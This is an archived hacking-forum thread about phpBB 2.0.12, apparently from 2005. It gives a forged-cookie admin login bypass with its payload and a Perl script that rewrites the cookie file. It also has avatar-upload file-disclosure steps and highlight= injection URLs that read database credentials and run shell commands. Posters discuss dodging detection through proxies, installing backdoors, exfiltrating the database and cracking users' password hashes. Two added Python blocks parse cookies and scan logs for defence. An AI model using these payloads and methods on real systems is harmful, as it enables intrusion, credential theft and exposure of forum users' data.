Forums: Phpbb2 Exploit - Forums


Phpbb2 Exploit

#1 White Scorpion

  • Master Sergeant
  • Group: Specialist
  • Posts: 674
  • Joined: 05-September 04

Posted 16 March 2005 - 01:51 AM



Quote

--------------------------------------------------------------------
Written by pureone@spywire.net
--------------------------------------------------------------------
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
--------------------------------------------------------------------
Let's get on with the show, shall we?
You'll need Firefox, which is found at > http://www.mozilla.org/
You'll also need the Live HTTP Headers plug-in, found at >
http://livehttpheaders.mozdev.org/
OK, once installed, find yourself a phpBB forum; I suggest you install
one locally.
You may need http://www.apachefri...g/en/xampp.html
http://prdownloads.sourceforge.net/phpbb/p...12.zip?download

OK, once installed, open your browser at http://127.0.0.1
and open Live HTTP Headers, which is found under Tools.

Look for the packet that says:

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

Click Replay.
On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
replace the a%3A0%3A%7B%7D with
a%3A2%3A%7Bs%3A11%3A%22autologinid%2%3Bb%3A1%3Bs%3A6%3A%22userid%2%3Bs%3A1%3A%222%22%3B%7D

Then once again click Replay.
Now you should be able to see the admin control panel,
and you will be logged in as the admin.
Exploited!
--------------------------------------------------------------------
Solution :
-------------------------------------------------------------------
Update to phpBB 2.0.13 or whatever version is out
at the time you read this.

or

open> includes/sessions.php
find
if( $sessiondata['autologinid'] == $auto_login_key )

replace with
if( $sessiondata['autologinid'] === $auto_login_key )


Source: Bugtraq mailing list.

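As an added illustration of the root cause and of the `===` fix quoted above (this is not code from the Bugtraq post or from phpBB itself): the `autologinid` in the `phpbb2*_data` cookie is a PHP-serialized value under the client's control, so it can be sent as a boolean `true` (`b:1`) instead of a string, and PHP's loose `==` then only compares truthiness against the stored key. The Python below parses that cookie format, emulates the loose and the strict comparison, and flags request header lines whose `autologinid` is not a string. The header lines, the session id and the stored key are constructed samples; the forged cookie value is the one posted above.

```python
"""Detect forged phpBB2 autologin cookies (added example, not phpBB code).

phpBB 2.0.12 checked the cookie's autologinid against the stored key with
PHP's loose '==' operator. The cookie is a PHP-serialized array that the
client controls, so it can carry a boolean true (b:1) instead of a string,
and true == "<any non-empty key>" holds. '===' rejects the type mismatch.
"""
import re
from urllib.parse import unquote


def php_unserialize(data):
    """Minimal parser for the flat PHP serialized values phpBB2 puts in its
    *_data cookie: a: arrays, s: strings, b: booleans, i: integers, N; null.
    Returns (value, unparsed_remainder)."""
    kind = data[0]
    if kind == 'N':                                   # N;
        return None, data[2:]
    if kind in ('b', 'i'):                            # b:1;  i:42;
        end = data.index(';')
        raw = data[2:end]
        return (raw == '1' if kind == 'b' else int(raw)), data[end + 1:]
    if kind == 's':                                   # s:11:"autologinid";
        colon = data.index(':', 2)
        length = int(data[2:colon])
        start = colon + 2                             # skip the :" prefix
        value = data[start:start + length]
        rest = data[start + length:]
        if not rest.startswith('";'):
            raise ValueError('bad string terminator')
        return value, rest[2:]
    if kind == 'a':                                   # a:2:{key;value;...}
        colon = data.index(':', 2)
        count = int(data[2:colon])
        rest = data[colon + 2:]                       # skip the :{ prefix
        result = {}
        for _ in range(count):
            key, rest = php_unserialize(rest)
            result[key], rest = php_unserialize(rest)
        if not rest.startswith('}'):
            raise ValueError('bad array terminator')
        return result, rest[1:]
    raise ValueError('unsupported serialized type %r' % kind)


def parse_data_cookie(encoded):
    """URL-decode and unserialize a phpbb2*_data cookie value into a dict."""
    value, rest = php_unserialize(unquote(encoded))
    if rest or not isinstance(value, dict):
        raise ValueError('cookie is not a single serialized array')
    return value


def php_loose_equals(a, b):
    """PHP 4/5 '==' for the case the bug hinges on: if either operand is a
    boolean, the other is cast to bool ('' and '0' are false, any other
    string is true) before comparing."""
    def to_bool(x):
        return x not in ('', '0') if isinstance(x, str) else bool(x)
    if isinstance(a, bool) or isinstance(b, bool):
        return to_bool(a) == to_bool(b)
    return a == b


def autologin_accepted(cookie_autologinid, stored_key, strict):
    """The 2.0.12 check (strict=False) versus the patched '===' check."""
    if strict:
        return isinstance(cookie_autologinid, str) and cookie_autologinid == stored_key
    return php_loose_equals(cookie_autologinid, stored_key)


COOKIE_RE = re.compile(r'(phpbb2\w*_data)=([^;\s]+)')


def flag_forged_cookies(header_lines):
    """Return (line_no, cookie_name, reason) for every request header line
    whose phpBB2 data cookie carries an autologinid that is not a string."""
    findings = []
    for n, line in enumerate(header_lines, 1):
        for name, raw in COOKIE_RE.findall(line):
            try:
                data = parse_data_cookie(raw)
            except (ValueError, IndexError):
                findings.append((n, name, 'unparseable cookie'))
                continue
            aid = data.get('autologinid')
            if aid is not None and not isinstance(aid, str):
                findings.append((n, name, 'autologinid is %s, not str' % type(aid).__name__))
    return findings


# Constructed samples: a normal logged-out cookie, an empty one, and the forged
# cookie from the post above. The sid and the stored key are made-up values.
STORED_KEY = 'e3b0c44298fc1c149afbf4c8996fb924'
FORGED_COOKIE = ('a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B'
                 's%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D')
SAMPLE_HEADERS = [
    'Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B'
    's%3A6%3A%22userid%22%3Bs%3A5%3A%2212345%22%3B%7D; phpbb2mysql_sid=0123456789abcdef',
    'Cookie: phpbb2support_data=a%3A0%3A%7B%7D',
    'Cookie: phpbb2mysql_data=' + FORGED_COOKIE,
]

if __name__ == '__main__':
    print('loose  ==  accepts forged cookie:', autologin_accepted(True, STORED_KEY, strict=False))
    print('strict === accepts forged cookie:', autologin_accepted(True, STORED_KEY, strict=True))
    for finding in flag_forged_cookies(SAMPLE_HEADERS):
        print('flagged:', finding)
```

The type check is the whole fix: with `===` a boolean never equals a string, whatever the key, and a proxy or log filter can reject the forged cookie on the same basis before it reaches the application.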

#2 SecureD

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 16 March 2005 - 06:20 AM

Thanks dude! I already knew this exploit, but didn't know there was a tool called LiveHTTPHeaders; seems pretty useful to me! Thanks again.

#3 Montana

  • Private
  • Group: Members
  • Posts: 16
  • Joined: 15-September 03

Posted 05 April 2005 - 06:30 AM

I get this:

Quote

http://www.xxx.com/forum/index.php

GET http://www.xxx.com/forum/index.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2212345%22%3B%7D; phpbb2mysql_sid=158b97f06e122d1d739b5c949a4353ce

HTTP/1.x 200 OK
Date: Tue, 05 Apr 2005 14:29:04 GMT
Server: Apache/1.3.33 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.10 FrontPage/5.0.2.2635 mod_ssl/2.8.22 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.10
Cache-Control: private, pre-check=0, post-check=0, max-age=0
Expires: 0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
Set-Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2212345%22%3B%7D; expires=Wed, 05-Apr-06 14:29:04 GMT; path=/
Set-Cookie: phpbb2mysql_sid=158b97f06e122d1d739b5c949a4353ce; path=/
Proxy-Connection: Close
----------------------------------------------------------
http://www.xxx.com/favicon.ico

GET http://www.xxx.com/favicon.ico HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
Accept: image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2212345%22%3B%7D; phpbb2mysql_sid=158b97f06e122d1d739b5c949a4353ce

HTTP/1.x 404 Not Found
Date: Tue, 05 Apr 2005 14:29:08 GMT
Server: Apache/1.3.33 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.10 FrontPage/5.0.2.2635 mod_ssl/2.8.22 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Proxy-Connection: Close
----------------------------------------------------------


help? :P

#4 cyrixx

  • Private First Class
  • Group: Members
  • Posts: 128
  • Joined: 29-November 03

Posted 05 April 2005 - 10:12 AM

Doesn't find the line with phpbb2support either... :(

#5 cduke250

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 07 June 2005 - 09:54 AM

Works great on 2.0.5

What can you do once you are logged in as administrator? I want to be able to execute code to download the database to make a clone install of my forum.


#!/usr/bin/perl
#
#   phpBB 2.0.12 Session Handling Administrator Authentication
#   Bypass EXPLOIT
#   written by phuket
#
#   The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit
#   for this bug.
#     http://packetstormsecurity.org/0503-exploits/phpbbsession.c
#
#   I tested this code with Firefox on my linux box, I do not know if it works
#   with mozilla or on windows
#   $url is the name of the cookie ( www.phpbb.com / $url= phpbb.com ) Look at
#   cookies.txt for the name of the cookie
#
#   I wrote this exploit after reading "phpBB 2.0.12 Session Handling
#   Administrator Authentication Bypass    -SIMPLIFIED-"  By PPC^Rebyte
#   and it is based on his code
#
#   Sorry for my bad english :/

use strict;
use warnings;

my $file = "/home/switch/.mozilla/default/542cry6r.slt/cookies.txt"; # path to your cookies.txt
my $url  = $ARGV[0];
die("usage: $0 <cookie host name>\n") unless defined $url;

# read the whole cookie file into memory
open(my $in, '<', $file) or die('File does not exist');
my @cookie = <$in>;
close $in;

my $exploit = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D";

# foreach aliases $i to the array element, so the substitution edits @cookie in place
foreach my $i (@cookie) {
    if ($i =~ /$url/) {
        $i =~ s/a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A(.*?)%3A%22(.*?)%22%3B%7D/$exploit/;
        print "OK\n";
    }
}

# write the modified cookie file back
open(my $out, '>', $file) or die('Can not write Cookie');
print $out @cookie;
close $out;

#greetings to Jubeltrubel,Julien S.,crosbow,XFlorian,Nibble,Trasher and Invi;)
#thx to Paiserist,PPC^Rebyte and to the unknown discoverer of this bug :)
#phuket




This also works with phpBB on an SSL connection.

do a
slocate cookies.txt

The cookies.txt listed in the code above is for Mozilla, not Firefox.

Clear all your cookies, then log in with your normal username. Then close the browser. cat your cookies.txt file to see the correct URL.

Then
$ phpBBphuket.pl server.secure.host.com

and it will reply OK if it works.

Then open your browser and go to the page and you will be logged in as the admin.

#6 SecureD

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 08 June 2005 - 07:05 PM

cduke250, on Jun 7 2005, 05:54 PM, said:

Works great on 2.0.5

What can you do once you are logged in as administrator?  I want to be able to e...

Then open your browser and go to the page and you will be logged in as the admin.


Just log on to the admin panel from the forum, download the database backup, filter all the hashes and decrypt the passwords :) as easy as that :P If you need any help, just PM me.

#7 cduke250

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 18 June 2005 - 02:47 PM

Here's what I ended up doing after I had admin access..

First I used a simple exploit to disclose the scripts directory.

Then I used the avatar exploit where you select a valid avatar from your computer, then you fill in a local path in the remote form, like /etc/passwd, and then you hit submit.

Now go to your browser and do a 'page info' and find the link to the avatar on the page like "site/images/avatars/984750982374509817.jpg"

Now wget the avatar.. It is really not a picture at all, but is the file you asked for renamed as a jpg image.

So now you have access to everything on the server.

=============================

Then I just connected to the MySQL database and downloaded all the MD5s of all the users..

=============================

What I would like to do is be able to upload to the server.. How can I accomplish this? Using phpMyAdmin?

What else can I do to gain more access or power to show off my security skills to my buddy?





NOTE: This is a buddy's forum and I had permission to audit the site. As you can tell, phpBB hacking is brand new for me, and I actually enjoy it, and I plan on setting up a new, upgraded and security-hardened phpBB forum for my friend.

#8 SecureD

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 18 June 2005 - 03:33 PM

cduke250, on Jun 18 2005, 10:47 PM, said:

Here's what I ended up doing after I had admin access..

So you used this exploit to get access?

Quote

First I used a simple exploit to disclose the scripts directory.
How did you do this?

Quote

Then I used the avatar exploit where you select a valid avatar from your computer, then you fill in a local path in the remote form, like /etc/passwd, and then you hit submit.

Now go to your browser and do a 'page info' and find the link to the avatar on the page like "site/images/avatars/984750982374509817.jpg"

Now wget the avatar.. It is really not a picture at all, but is the file you asked for renamed as a jpg image.

I understand this part, but how did you do this?

Quote

So now you have access to everything on the server.

=============================

Then I just connected to the MySQL database and downloaded all the MD5s of all the users..
If you need some decrypted, pm me.

Quote

=============================

What I would like to do is be able to upload to the server.. How can I accomplish this? Using phpMyAdmin?

What else can I do to gain  more access or power to show off my security skills to my buddy?

If you got the PWs decrypted, you can try to connect to the SSH daemon, or FTP, email etc. In email, for example, there are often more security details like account information etc.

Quote

NOTE: This is a buddy's forum and I had permission to audit the site. As you can tell, phpBB hacking is brand new for me, and I actually enjoy it, and I plan on setting up a new, upgraded and security-hardened phpBB forum for my friend.
lol ;-) yeah sure :P No, I believe you.

Hope you can give some answers :) Like the way you post. Very nice.

#9 cduke250

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 18 June 2005 - 10:07 PM

Quote

So you used this exploit to get access?
What I did was use 2 browsers. Firefox and Mozilla. I accessed the forum with my normal user info in both browsers. Then I closed Mozilla, put the cookie file info in the perl script, ran, and then opened mozilla and using a https-capable anonymous proxy went to the forum page [ https://site/phpBB/ ] and was automatically logged in as the administrator user.

Viewing the [ who is online ] page shows my normal user and shows the admin user, from separate IPs. Using different IPs helps to minimize risk of detection.

Quote

How did you do this?

There are a number of simple path disclosure exploits.

Here is one that works even if you aren't logged in or a registered user
/faq.php?faq=waraxe

More file disclosure vulns




Quote

I understand this part, but how did you do this?
I filled in the form for "Upload avatar from local computer" with a valid avatar image on my machine. Then I filled in the form for "Upload avatar from remote url" with /etc/passwd
Then you hit submit.

What happens is /etc/passwd gets copied to a file that should be your avatar. So the file /etc/passwd is now named avatars/07432057098.jpg or whatever.

You can also use this same vulnerability to delete files off the server, but there are easier ways.

Quote

If you got the pws decrypted, you can try connect to the ssh deamon, or ftp, email etc. In email for example often are more security detials like account information etc.




Here's what I've tried since then..

I found out that there is a vulnerability that lets you easily execute commands on the server. Here are some examples. Using this you can get the config.php info like dbuser and dbpassword without having admin status!
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbuser.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbname.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbpasswd.%2527


And here is the format that I use to execute commands as normal user:
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527
&ls=cd%20dbadmin%20;mv%20.htaccess%20.htaccess.backup%20;ls%20-ap
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=cat%20/etc/fstab
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id




I haven't tried anything more than that (it's relatively easy to execute MySQL commands to modify the SQL database), really because I don't want to disrupt the site. I have been able to touch files and chmod files in key directories like dbadmin/, files/, etc., so it should be easy to install a backdoor. I'm thinking something simple like leatherman.php or something like reversewwwshell.pl.

I only really want to be able to download the entire database (maybe tar and gzip the entire $HOME directory and then scp or curl it to one of my servers, or just move the tgz file to the htdocs folder and serve it up for retrieval).

Any ideas?


Quote

If you need some decrypted, pm me.

I haven't cracked any passwords since SAMInside first came out; back then RainbowCrack was still a work in progress..

What would you suggest as the best way to crack the MD5s? I accessed the phpMyAdmin page for the site at the provider's backend server (because at first I couldn't get past the .htaccess at dbadmin/) and instead of exporting or saving anything I just browsed through the phpbb_users database and manually saved each page.

The site's admin panel has the database backup function, but the only backup I can get to work is [ Structure ] only. So I have to use a mysql command or something like 'tar -zcvf' and then find a method of transport.


NOTE: Only tested on heavily customized/modified phpBB2.05
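An added detection example, not from this thread's author or from phpBB: the injected `highlight=` requests quoted above have a shape no legitimate search term has (a double-encoded quote that survives the first URL decode, a PHP `$` sigil, or a backtick), so they can be picked out of an ordinary Apache access log after the fact. The log lines below are constructed; the URLs in them are the ones posted above, and the client addresses are documentation addresses.

```python
"""Flag phpBB2 viewtopic.php highlight= injection attempts in an access log.

Added example. The URLs are the ones quoted in this thread; the surrounding
log lines, timestamps and IP addresses are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common log format, just the fields this check needs.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def check_highlight(url):
    """Return the reasons a request's highlight= parameter looks injected,
    or an empty list for a benign one.

    Apache/PHP decode the query string once; the vulnerable phpBB code decoded
    it a second time, which is why the payload carries %2527 (-> %27 -> ').
    A genuine search term has no percent sign left after the first decode and
    contains no quote, dollar sign or backtick.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)  # first decode
    reasons = []
    for once in params.get('highlight', []):
        twice = unquote(once)                                         # what the bug did
        if '%' in once:
            reasons.append('double URL-encoding')
        if "'" in twice:
            reasons.append('quote character after second decode')
        if '$' in twice:
            reasons.append('PHP variable sigil')
        if '`' in twice:
            reasons.append('backtick (shell command substitution)')
    return reasons


def scan_access_log(lines):
    """Return (ip, url, reasons) for every CLF line whose request is suspect."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue    # not a CLF line; a real deployment would count these
        reasons = check_highlight(m.group('url'))
        if reasons:
            hits.append((m.group('ip'), m.group('url'), reasons))
    return hits


# Constructed log: two ordinary requests, then the injected ones from the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jun/2005:01:28:00 +0000] "GET /forum/index.php HTTP/1.1" 200 8123',
    '203.0.113.5 - - [19/Jun/2005:01:28:01 +0000] "GET /forum/viewtopic.php?t=8231&highlight=phpbb HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Jun/2005:01:28:03 +0000] "GET /forum/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id HTTP/1.1" 200 6011',
    '203.0.113.9 - - [19/Jun/2005:01:28:05 +0000] "GET /forum/viewtopic.php?t=8231&highlight=%2527.$poster=$dbpasswd.%2527 HTTP/1.1" 200 6011',
]

if __name__ == '__main__':
    for ip, url, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, url)
        print('    ' + '; '.join(reasons))
```

The double-encoding, `$` and backtick checks are the high-confidence ones; the quote check on its own will also fire on a genuine search for a term with an apostrophe, so weight it lower or require it together with one of the others when turning this into an alert.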

#10 SecureD

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 19 June 2005 - 01:28 AM

cduke250, on Jun 19 2005, 06:07 AM, said:

What I did was use 2 browsers.  Firefox and Mozilla.  I accessed the forum with my normal user info in both browsers.  Then I closed Mozilla, put the cookie file info in the perl script, ran, and then opened mozilla and using a https-capable anonymous proxy went to the forum page  [ https://site/phpBB/ ]  and was automatically logged in as the administrator user.

Viewing the [ who is online ] page shows my normal user and shows the admin user, from separate IPs.  Using different IPs helps to minimize risk of detection. 

Nice :)

Quote

There are a number of simple path disclosure exploits. 
Here is one that works even if you aren't logged in or a registered user
/faq.php?faq=waraxe

More file disclosure vulns

Now I've got to try this one. Have a moment. Okay. I didn't know this exploit. Didn't look far enough. But when I try this I get this message:
Fatal error: [] operator not supported for strings in /var/www/html/forum/language/lang_dutch/lang_bbcode.php on line 41

Quote

I filled in the form for "Upload avatar from local computer" with a valid avatar image on my machine.  Then I filled in the form for "Upload avatar from remote url" with /etc/passwd
Then you hit submit.

What happens is /etc/passwd gets copied to a file that should be your avatar.  So the file /etc/passwd is now named avatars/07432057098.jpg or whatever.

You can also use this same vulnerability to delete files off the server, but there are easier ways.
This is very evil. I tested it on a few forums, and none of them are secured against this.

Quote

Here's what I've tried since then..

I found out that there is a vulnerability that lets you easily execute commands on the server.  Here are some examples.  Using this you can get the config.php info like dbuser and dbpassword without having admin status!
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbuser.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbname.%2527
/viewtopic.php?t=8231&highlight=%2527.$poster=$dbpasswd.%2527


And here is the format that I use to execute commands as normal user:
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527
&ls=cd%20dbadmin%20;mv%20.htaccess%20.htaccess.backup%20;ls%20-ap
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=cat%20/etc/fstab
/viewtopic.php?t=8231&highlight=%2527.$poster=%60$ls%60.%2527&ls=id


I haven't tried anything more than that (it's relatively easy to execute MySQL commands to modify the SQL database), really because I don't want to disrupt the site. I have been able to touch files and chmod files in key directories like dbadmin/, files/, etc., so it should be easy to install a backdoor. I'm thinking something simple like leatherman.php or something like reversewwwshell.pl.

Not working for me on any forum.

Quote

I only really want to be able to download the entire database (maybe tar and gzip the entire $HOME directory and then scp or curl it to one of my servers, or just move the tgz file to the htdocs folder and serve it up for retrieval).

Any ideas?

I haven't cracked any passwords since SAMInside first came out; back then RainbowCrack was still a work in progress..

What would you suggest as the best way to crack the MD5s? I accessed the phpMyAdmin page for the site at the provider's backend server (because at first I couldn't get past the .htaccess at dbadmin/) and instead of exporting or saving anything I just browsed through the phpbb_users database and manually saved each page.

The site's admin panel has the database backup function, but the only backup I can get to work is [ Structure ] only. So I have to use a mysql command or something like 'tar -zcvf' and then find a method of transport.

This is the easiest part ;-) When you are logged on as administrator, go to the administrator page. Select the backup database part. Then say you want a full backup and type into the text field that you want the part phpbb_users. You can also check the option if you want to compress it. I think this should work. Can you try it?

What I suggest for cracking the MD5s is just sending me a copy of the hashes you got. You can filter them out of the SQL backup. I have generated a lot of rainbow tables in the past few months, so I will be able to crack at least 44%.

Quote

NOTE: Only tested on heavily customized/modified phpBB2.05

#11 cduke250

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 19 June 2005 - 01:08 PM

I don't feel safe sharing the MD5s; the passwords might contain sensitive site information that I really do not want to get out. The site is an SSL forum that is meant to be highly secure.

I should also mention that chkrootkit and ClamAV are installed. Also, it's a FreeBSD system.

-----------------

Quote

Now I've got to try this one. Have a moment. Okay. I didn't know this exploit. Didn't look far enough. But when I try this I get this message:
Fatal error: [] operator not supported for strings in /var/www/html/forum/language/lang_dutch/lang_bbcode.php on line 41


Ya, so it works; it reveals that the directory is [ /var/www/html/forum ], so now for the avatar exploit you would type in /var/www/html/forum/config.php and you will have it.

(Why is the lang Dutch? Are you from the NL?)

#12 SecureD

  • Private First Class
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 19 June 2005 - 04:10 PM

cduke250, on Jun 19 2005, 09:08 PM, said:

I don't feel safe sharing the MD5s; the passwords might contain sensitive site information that I really do not want to get out. The site is an SSL forum that is meant to be highly secure.

I should also mention that chkrootkit and ClamAV are installed. Also, it's a FreeBSD system.

-----------------

Quote

Now I've got to try this one. Have a moment. Okay. I didn't know this exploit. Didn't look far enough. But when I try this I get this message:
Fatal error: [] operator not supported for strings in /var/www/html/forum/language/lang_dutch/lang_bbcode.php on line 41


Ya, so it works; it reveals that the directory is [ /var/www/html/forum ], so now for the avatar exploit you would type in /var/www/html/forum/config.php and you will have it.

(Why is the lang Dutch? Are you from the NL?)


Yup, I'm Dutch :) Now I understand why you use the stuff that reveals the dir. I just guessed where the config file was, and I guessed it right ;-). I understand you don't want to share the whole MySQL DB content. You can, if you want, send me only the MD5 hashes. Without any further information I cannot use them at all, but can only crack the MD5s and send you the result. I like to crack them to see how many % I get cracked.

#13 cduke250

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 27 June 2005 - 04:25 PM

Hey, I have a lot of friends who are Dutch; I have a lot of love for how the Netherlands said NO to the empire (EU).

Like I said, I don't want to share the MD5s because once the passwords are decrypted, they might contain site information like the URL or something. Someone's password might conceivably be [ nameofforum ] or something, and I don't have my friend's permission to do that. Remember, this is supposed to be an ultra-secure site.

====================================

Here's what I still would like:
  • Best way to decrypt the MD5s
  • Best way to retrieve the MD5s using phpMyAdmin or SQL commands


#14 cduke250

  • Corporal
  • Group: Members
  • Posts: 196
  • Joined: 13-October 04

Posted 27 June 2005 - 09:45 PM


Avatar exploit:
http://sceptre1.spymac.com/images/o.jpg

#15 extreme

  • Specialist
  • Group: Specialist
  • Posts: 594
  • Joined: 02-September 03

Posted 28 June 2005 - 04:03 PM

What to do next when you have the content of config.php?
Which tool to use to connect to SQL, port number, etc.

Did you find a way to upload your own file?
